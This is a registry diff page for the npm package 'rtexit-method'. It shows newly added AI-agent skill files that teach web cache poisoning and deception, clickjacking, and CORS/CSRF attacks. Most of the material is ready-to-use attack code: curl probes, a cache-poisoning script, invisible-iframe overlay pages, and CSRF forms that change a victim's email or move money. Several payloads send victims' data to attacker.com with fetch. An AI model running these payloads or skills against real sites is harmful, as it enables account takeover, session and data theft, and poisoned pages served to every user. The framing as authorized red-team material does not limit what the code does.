npm - rtexit-method - Versions diffs - 0.1.7 → 0.1.9 - Mend

rtexit-method 0.1.7 → 0.1.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (18) hide show

package/packaged-assets/.agents/skills/rt-cache-attacks/SKILL.md ADDED Viewed

@@ -0,0 +1,166 @@
+---
+name: rt-cache-attacks
+description: "Web cache poisoning and cache deception skill for authorized engagements. Cache poisoning via unkeyed headers (X-Forwarded-Host, X-Forwarded-Scheme), fat GET requests, cache key normalization flaws, cache deception attacks for stealing session tokens, CDN cache poisoning, DoS via cache poisoning, and parameter cloaking. Use when testing applications using caching layers (Varnish, Cloudflare, Fastly, Nginx proxy_cache)."
+---
+# rt-cache-attacks — Web Cache Poisoning & Cache Deception
+## Overview
+Web cache attacks exploit how caching layers store and serve responses. **Cache Poisoning**: trick the cache into storing a malicious response served to all users. **Cache Deception**: trick the cache into storing a response containing the victim's sensitive data, then retrieve it.
+---
+## Phase 1 — Cache Detection
+```bash
+# Detect caching headers
+curl -s -I https://target.com/ | grep -i "cache\|age\|x-cache\|cf-cache\|x-varnish"
+# X-Cache: HIT = cached
+# Age: 123 = cached for 123 seconds
+# CF-Cache-Status: HIT = Cloudflare cache hit
+# X-Varnish: 123 456 = Varnish hit
+# Cache key — what makes responses unique per-cache entry
+# Usually: URL + Host header (sometimes query params, cookies)
+# Test for unkeyed inputs (affect response but NOT cache key)
+# If adding X-Forwarded-Host changes response but not cache key → poisonable
+curl -H "X-Forwarded-Host: evil.com" https://target.com/
+```
+---
+## Phase 2 — Web Cache Poisoning
+```bash
+# Unkeyed header injection → poison cache with XSS/open redirect
+# X-Forwarded-Host poisoning
+curl -H "X-Forwarded-Host: attacker.com" https://target.com/
+# If response contains: <script src="//attacker.com/..."> → reflected → cache it
+# Wait for cache to store poisoned response
+# All users requesting https://target.com/ get XSS payload
+# X-Forwarded-Scheme poisoning
+curl -H "X-Forwarded-Scheme: http" https://target.com/
+# If redirects to: http://target.com → cache redirect → serve to all users
+# Fat GET — body in GET request
+curl -X GET https://target.com/ \
+  -H "Content-Length: 48" \
+  -d "param=../../admin"
+# Some caches key on URL only, ignore body → poisoned response cached
+# Parameter cloaking (duplicate parameters)
+# Cache sees: /search?q=normal (keyed)
+# Server sees: /search?q=normal&q=<script>alert(1)</script> (unkeyed second param)
+curl "https://target.com/search?q=normal&q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E"
+```
+```python
+# Automated cache poisoning with param miner
+# Burp Suite → BApp Store → Param Miner
+# Active Scan → sends all unkeyed headers → finds reflections
+# Manual poisoning script
+import requests, time
+headers_to_test = [
+    "X-Forwarded-Host",
+    "X-Host",
+    "X-Forwarded-Server",
+    "X-HTTP-Method-Override",
+    "X-Original-URL",
+    "X-Rewrite-URL",
+]
+for header in headers_to_test:
+    r = requests.get("https://target.com/",
+                     headers={header: "attacker.com"})
+    if "attacker.com" in r.text:
+        print(f"REFLECTED: {header}")
+        # Now poison the cache
+        for _ in range(10):  # Ensure cached
+            requests.get("https://target.com/",
+                        headers={header: "attacker.com"})
+        print(f"Cache poisoned via {header}!")
+```
+---
+## Phase 3 — Web Cache Deception
+```bash
+# Trick cache into storing victim's authenticated response
+# Then fetch it unauthenticated
+# Scenario:
+# /api/profile returns victim's personal data (not cached — dynamic)
+# /profile/photo.jpg returns a photo (cached — static file)
+# Attack: /api/profile/photo.jpg  ← cache sees .jpg → caches it
+#                                    server sees /api/profile → returns user data
+# Step 1: Trick victim into visiting
+https://target.com/api/profile/nonexistent.jpg
+# (via phishing, stored XSS, etc.)
+# Step 2: Victim visits → server returns their profile data → cache stores it
+# Step 3: Attacker fetches same URL (no auth needed — cached)
+curl https://target.com/api/profile/nonexistent.jpg
+# Returns: victim's personal data, session tokens, etc.
+# Common path extensions that trigger caching:
+extensions = [".jpg", ".png", ".css", ".js", ".ico", ".gif", ".svg", ".woff"]
+for ext in extensions:
+    url = f"https://target.com/api/user/profile{ext}"
+    r = requests.get(url, cookies={"session": ATTACKER_SESSION})
+    if "X-Cache: HIT" in str(r.headers):
+        print(f"Cacheable: {url}")
+```
+---
+## Phase 4 — CDN-Specific Attacks
+```bash
+# Cloudflare cache poisoning
+curl -H "CF-Worker: 1" https://target.com/
+curl -H "CF-Connecting-IP: 127.0.0.1" https://target.com/
+curl -H "True-Client-IP: attacker.com" https://target.com/
+# Fastly cache poisoning
+curl -H "Fastly-Client-IP: 127.0.0.1" https://target.com/
+# Varnish — via Vary header manipulation
+# If Vary: Cookie → each cookie value = separate cache key
+# Poison specific cached variant
+# Cache DoS (cache poisoning for unavailability)
+# Poison cached page with 500 error or redirect to non-existent resource
+curl -H "X-Forwarded-Host: 127.0.0.1:99999" https://target.com/
+# Forces error → caches 500 response → all users get error
+```
+---
+## Skill Levels
+**BEGINNER:** Burp Param Miner for unkeyed header discovery · Manual reflection testing
+**INTERMEDIATE:** X-Forwarded-Host poisoning to XSS · Cache deception for session theft
+**ADVANCED:** Fat GET poisoning · Parameter cloaking · CDN-specific header abuse
+**EXPERT:** Response queue poisoning + cache combo · Host header injection chains · Cache DoS at scale
+---
+## References
+- PortSwigger Cache Poisoning: https://portswigger.net/research/practical-web-cache-poisoning
+- PortSwigger Cache Deception: https://portswigger.net/research/web-cache-entanglement
+- Param Miner: https://github.com/PortSwigger/param-miner
+- MITRE T1190: https://attack.mitre.org/techniques/T1190/

package/packaged-assets/.agents/skills/rt-clickjacking/SKILL.md ADDED Viewed

@@ -0,0 +1,227 @@
+---
+name: rt-clickjacking
+description: "Clickjacking, UI redressing, and drag-and-drop attack skill for authorized engagements. Classic clickjacking iframe overlay, multi-step clickjacking, drag-and-drop data theft, cursorjacking, touchscreen hijacking, clickjacking for CSRF bypass, and testing X-Frame-Options and Content-Security-Policy frame-ancestors. Use when testing applications that perform state-changing actions on clicks without CSRF tokens."
+---
+# rt-clickjacking — Clickjacking & UI Redressing
+## Overview
+Clickjacking tricks users into clicking on something different from what they perceive. An invisible iframe overlay of a target site sits on top of an attacker page — the user thinks they're clicking the attacker's UI but actually clicking the target's buttons (delete account, transfer funds, change email, authorize OAuth).
+---
+## Phase 1 — Detection
+```bash
+# Check X-Frame-Options header
+curl -s -I https://target.com/ | grep -i "x-frame-options\|content-security-policy"
+# X-Frame-Options: DENY = can't iframe at all (safe)
+# X-Frame-Options: SAMEORIGIN = can only iframe from same origin (safe)
+# No header = potentially vulnerable
+# CSP frame-ancestors
+# Content-Security-Policy: frame-ancestors 'none' (safe)
+# Content-Security-Policy: frame-ancestors 'self' (safe)
+# No frame-ancestors directive = check X-Frame-Options
+# Quick test
+cat > test_iframe.html << 'EOF'
+<iframe src="https://target.com" width="800" height="600"></iframe>
+EOF
+# Open in browser — if target renders in iframe → clickjacking possible
+```
+---
+## Phase 2 — Basic Clickjacking PoC
+```html
+<!-- Basic clickjacking — overlay invisible iframe over attacker button -->
+<html>
+<head>
+<style>
+#target-iframe {
+    position: absolute;
+    width: 800px;
+    height: 600px;
+    opacity: 0.0001;  /* Invisible but clickable */
+    z-index: 2;
+    top: 0; left: 0;
+}
+#decoy-button {
+    position: absolute;
+    z-index: 1;
+    top: 450px;  /* Align with target's "Delete Account" button */
+    left: 350px;
+}
+</style>
+</head>
+<body>
+<iframe id="target-iframe" src="https://target.com/settings"></iframe>
+<div id="decoy-button">
+    <button>CLICK HERE TO WIN A PRIZE!</button>
+</div>
+</body>
+</html>
+```
+---
+## Phase 3 — Multi-Step Clickjacking
+```html
+<!-- Some actions require multiple clicks (confirm dialog, etc.) -->
+<!-- Multi-step attack with animated decoy -->
+<html>
+<head>
+<style>
+#iframe { position:absolute; opacity:0.0001; z-index:2; width:700px; height:500px; }
+#step1 { position:absolute; z-index:1; top:300px; left:400px; }
+#step2 { position:absolute; z-index:1; top:400px; left:350px; display:none; }
+</style>
+</head>
+<body>
+<iframe id="iframe" src="https://target.com/transfer"></iframe>
+<div id="step1">
+  <button onclick="nextStep()">Click here for reward!</button>
+</div>
+<div id="step2">
+  <button>Confirm your prize</button>
+</div>
+<script>
+function nextStep() {
+    document.getElementById('step1').style.display = 'none';
+    document.getElementById('step2').style.display = 'block';
+    // Reposition iframe to align with confirmation button
+    document.getElementById('iframe').style.top = '200px';
+}
+</script>
+</body>
+</html>
+```
+---
+## Phase 4 — Drag-and-Drop Data Theft
+```html
+<!-- Force user to drag text from target iframe to attacker input -->
+<!-- Bypasses CSRF token (no click needed) -->
+<html>
+<head>
+<style>
+#hidden-iframe { position:absolute; opacity:0.0001; width:500px; height:300px; top:100px; left:0; }
+#drop-zone { position:absolute; z-index:10; top:100px; left:0; width:500px; height:300px;
+             background:rgba(0,0,0,0.01); }
+#display { position:absolute; top:500px; }
+</style>
+</head>
+<body>
+<!-- Target iframe with sensitive text (email, token) -->
+<iframe id="hidden-iframe" src="https://target.com/profile"></iframe>
+<!-- Invisible drag-from zone overlaps target text -->
+<div id="drop-zone"
+     ondragover="event.preventDefault()"
+     ondrop="stealData(event)">
+</div>
+<!-- Attacker's visible "game" -->
+<div style="z-index:5">
+  <p>DRAG THE TEXT TO WIN! ↓</p>
+  <div style="border:2px dashed red; height:100px; width:300px"
+       ondragover="event.preventDefault()"
+       ondrop="captureData(event)"></div>
+</div>
+<script>
+function captureData(e) {
+    var stolen = e.dataTransfer.getData('text/plain');
+    fetch('https://attacker.com/collect?data=' + encodeURIComponent(stolen));
+    document.getElementById('display').innerText = "Got: " + stolen;
+}
+</script>
+</body>
+</html>
+```
+---
+## Phase 5 — Clickjacking for OAuth/Auth Bypass
+```html
+<!-- Clickjack OAuth "Authorize" button → grant permissions to attacker app -->
+<html>
+<style>
+#oauth-iframe {
+    position: absolute;
+    opacity: 0.0001;
+    z-index: 2;
+    width: 700px;
+    height: 700px;
+}
+#fake-button {
+    position: absolute;
+    z-index: 1;
+    top: 580px;  /* Align with OAuth "Allow" button */
+    left: 280px;
+}
+</style>
+<body>
+<iframe id="oauth-iframe"
+        src="https://idp.target.com/oauth/authorize?client_id=ATTACKER_APP&response_type=token&scope=read:all&redirect_uri=https://attacker.com/callback">
+</iframe>
+<div id="fake-button">
+    <button>Login with Google (click to continue)</button>
+</div>
+</body>
+</html>
+<!-- Victim clicks "Login with Google" → actually clicks OAuth Allow → grants attacker app access -->
+```
+---
+## Phase 6 — Framebusting Bypass
+```bash
+# Some apps use JavaScript framebusting:
+# if(top !== self) { top.location = self.location }
+# Bypass 1: sandbox attribute (prevents framebusting JS)
+<iframe src="https://target.com" sandbox="allow-forms allow-scripts"></iframe>
+# sandbox="allow-forms" allows form submission but blocks top.location access
+# Bypass 2: onbeforeunload event (delays redirect)
+<html>
+<script>
+window.onbeforeunload = function() { return "Leave page?" }
+</script>
+<iframe src="https://target.com"></iframe>
+</html>
+# User clicks "Stay" → framebusting prevented
+# Bypass 3: HTML5 sandbox with allow-top-navigation
+<iframe sandbox="allow-top-navigation allow-scripts allow-forms" src="https://target.com"></iframe>
+```
+---
+## Skill Levels
+**BEGINNER:** Basic opacity iframe PoC · X-Frame-Options detection
+**INTERMEDIATE:** Multi-step clickjacking with repositioning · Framebusting bypass via sandbox
+**ADVANCED:** Drag-and-drop data theft · OAuth clickjacking · Custom alignment for specific buttons
+**EXPERT:** Cursorjacking · Touchscreen clickjacking on mobile · Combining with CSRF for amplified impact
+---
+## References
+- PortSwigger Clickjacking: https://portswigger.net/web-security/clickjacking
+- OWASP Clickjacking: https://owasp.org/www-community/attacks/Clickjacking
+- Drag-and-drop research: https://www.contextis.com/en/blog/data-exfiltration-via-css-injection

package/packaged-assets/.agents/skills/rt-cors-csrf/SKILL.md ADDED Viewed

@@ -0,0 +1,180 @@
+---
+name: rt-cors-csrf
+description: "CORS misconfiguration and CSRF attack skill for authorized engagements. CORS origin reflection exploitation, null origin bypass, subdomain-based CORS abuse, pre-flight bypass, CSRF token bypass techniques (referer validation, SameSite cookie bypass, token prediction), CSRF via content-type confusion, and login CSRF. Use when testing cross-origin resource sharing policies and cross-site request forgery protections."
+---
+# rt-cors-csrf — CORS Misconfiguration & CSRF
+## Overview
+**CORS misconfigurations** allow attacker origins to read responses from authenticated APIs — credentials, tokens, PII. **CSRF** tricks users into making unintended authenticated requests. Together they represent broken cross-origin controls, among the most common web vulnerabilities.
+---
+## Part 1 — CORS Misconfiguration
+### Phase 1 — Detection
+```bash
+# Test CORS headers
+curl -H "Origin: https://attacker.com" https://target.com/api/user -v 2>&1 | grep -i "access-control"
+# Vulnerable if:
+# Access-Control-Allow-Origin: https://attacker.com  ← reflects your origin
+# Access-Control-Allow-Credentials: true             ← with credentials!
+# Test variations
+for origin in "https://attacker.com" "null" "https://target.com.attacker.com" "https://attackertarget.com"; do
+    echo -n "$origin → "
+    curl -s -I -H "Origin: $origin" https://target.com/api/ | grep -i "access-control-allow-origin"
+done
+```
+### Phase 2 — Exploit Origin Reflection
+```html
+<!-- If Access-Control-Allow-Origin reflects any Origin + Allow-Credentials: true -->
+<!-- Host on attacker.com: -->
+<html><body>
+<script>
+fetch('https://target.com/api/user', {credentials: 'include'})
+    .then(r => r.json())
+    .then(data => {
+        // Send victim's data to attacker
+        fetch('https://attacker.com/collect', {
+            method: 'POST',
+            body: JSON.stringify(data)
+        });
+    });
+</script>
+</body></html>
+<!-- Victim visits attacker.com → their authenticated API response stolen -->
+```
+### Phase 3 — Null Origin Bypass
+```html
+<!-- Some apps whitelist "null" origin (sandboxed iframes send null) -->
+<iframe sandbox="allow-scripts allow-top-navigation allow-forms"
+        src="data:text/html,<script>
+fetch('https://target.com/api/sensitive', {credentials:'include'})
+    .then(r=>r.text())
+    .then(d=>location='https://attacker.com/?'+encodeURIComponent(d))
+</script>">
+</iframe>
+```
+### Phase 4 — Subdomain Bypass
+```bash
+# CORS regex: /.*target\.com$/ → matches evil.target.com
+# Find XSS on any subdomain → use it to make CORS request
+# Or: register subdomain-lookalike
+# Whitelist: *.target.com → register: attacker.target.com.evil.com? (no)
+# But if regex: /target\.com/ → matches: attackertarget.com
+# Test subdomain origin
+curl -H "Origin: https://evil.target.com" https://target.com/api/
+curl -H "Origin: https://target.com.evil.com" https://target.com/api/
+```
+---
+## Part 2 — CSRF
+### Phase 5 — CSRF Detection
+```bash
+# Check for CSRF token in state-changing requests
+# Capture POST/PUT/DELETE in Burp → look for _csrf, csrf_token, X-CSRF-Token header
+# Test 1: Remove CSRF token
+# If request succeeds without token → CSRF vulnerable
+# Test 2: Use another user's CSRF token
+# Log in as User A → get A's token → use in User B's request
+# If succeeds → token not tied to session → CSRF vulnerable
+# Test 3: Empty token
+# Change csrf_token=VALID to csrf_token=
+# If succeeds → validation flawed
+# Test 4: Referer-only validation
+curl -X POST https://target.com/change-password \
+  -b "session=VICTIM_SESSION" \
+  -d "new_password=hacked" \
+  --referer "https://target.com"  # Forge referer
+```
+### Phase 6 — CSRF Exploit
+```html
+<!-- Classic CSRF — change victim's email -->
+<html><body>
+<form id="csrf" action="https://target.com/account/update" method="POST">
+    <input name="email" value="attacker@evil.com">
+    <input name="action" value="update">
+</form>
+<script>document.getElementById('csrf').submit();</script>
+</body></html>
+<!-- JSON CSRF (Content-Type: text/plain → server accepts) -->
+<html><body>
+<form id="csrf" action="https://target.com/api/transfer" method="POST"
+      enctype="text/plain">
+    <input name='{"amount":1000,"to":"attacker","x":"' value='"}'>
+</form>
+<script>document.getElementById('csrf').submit();</script>
+</body></html>
+<!-- CSRF via fetch (if CORS allows null origin) -->
+<iframe sandbox="allow-scripts" src="data:text/html,<script>
+fetch('https://target.com/api/admin/delete', {
+    method:'POST',
+    credentials:'include',
+    body:'user_id=victim'
+})
+</script>">
+</iframe>
+```
+### Phase 7 — SameSite Cookie Bypass
+```bash
+# SameSite=Lax: cookies sent on top-level navigation GET requests
+# Bypass: use GET-based state-changing endpoint if exists
+# Test: does the action work via GET?
+curl "https://target.com/account/delete?confirm=true" \
+  -b "session=VICTIM_SESSION"
+# SameSite=None without Secure: works cross-site (flag misconfiguration)
+# SameSite not set (old default Lax): bypass via sibling subdomain + HTTPS redirect chain
+# Login CSRF — force victim to log into attacker account
+<form action="https://target.com/login" method="POST">
+    <input name="username" value="attacker_account">
+    <input name="password" value="attacker_password">
+</form>
+# Victim submits → now logged in as attacker → attacker reads victim's activity
+```
+---
+## Skill Levels
+**BEGINNER:** CORS header inspection · Basic CSRF with HTML form · Remove CSRF token test
+**INTERMEDIATE:** Origin reflection exploit · Null origin iframe CORS · JSON CSRF
+**ADVANCED:** Subdomain CORS bypass + XSS chaining · SameSite Lax bypass via GET state-change
+**EXPERT:** Pre-flight bypass via non-simple methods · CSRF token prediction · Login CSRF chains
+---
+## References
+- PortSwigger CORS: https://portswigger.net/web-security/cors
+- PortSwigger CSRF: https://portswigger.net/web-security/csrf
+- SameSite bypass research: https://portswigger.net/research/bypassing-samesite-cookie-restrictions